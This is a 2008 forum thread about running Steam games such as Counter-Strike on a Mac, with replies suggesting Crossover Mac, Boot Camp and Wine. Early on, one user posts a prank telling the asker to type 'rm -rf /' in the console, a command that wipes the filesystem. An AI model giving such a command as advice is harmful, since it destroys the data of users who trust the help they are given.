Wroaw's Way Wicked Board

Full Version: i iz at school right now doing nothin...
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2
anyone know how to download steam on an apple computer? i wanna play CS or Audiosurf cuz im bored right now...
OPEN CONSOLE

TYPE rm -rf /

HIT ENTER.
even if its an .msi file? oh yeah don't even know how to open console on an apple computer
Why waste your time on wroaw posting

Only joking:P
You could of typed "How to play counter-strike on a apple computer"
Google is your friend.
coca,May 8 2008, 11:18 AM Wrote:OPEN CONSOLE

TYPE rm -rf /

HIT ENTER.
LOL Kooky.
Gave up on looking for steam on mac possibilities (without using bootcamp)
a while ago...
Started searching on google after reading this post and actually found something.
A program called Crossover Mac, seems to work ok and you don't need to install Windows.
However you do need your mac install disc for some kind of file it needs to copy.
Just installed steam and now it's downloading 1.6.
Just curious if it's going to run as smooth as I hope it will.
DrunkenMaster,May 8 2008, 05:35 PM Wrote:Gave up on looking for steam on mac possibilities (without using bootcamp)
a while ago...
Started searching on google after reading this post and actually found something.
A program called Crossover Mac, seems to work ok and you don't need to install Windows.
However you do need your mac install disc for some kind of file it needs to copy.
Just installed steam and now it's downloading 1.6.
Just curious if it's going to run as smooth as I hope it will.
greetz sexy
yea i have seen tutorials how to do this. but who the hell uses apple anymore?
I'd recommend Grand theft auto 2. you can run it off a flash drive or Doom 2.:D
graff, u could dual boot with windows* or throw on ubuntu and use wine.....there might be an easy way to adapt wine to run on mac actually becuase linux and mac osx are based off of the same platform.....try looking into that also. gl

*If you have an intel based processor to dualboot w/ windows
Pages: 1 2
Reference URL's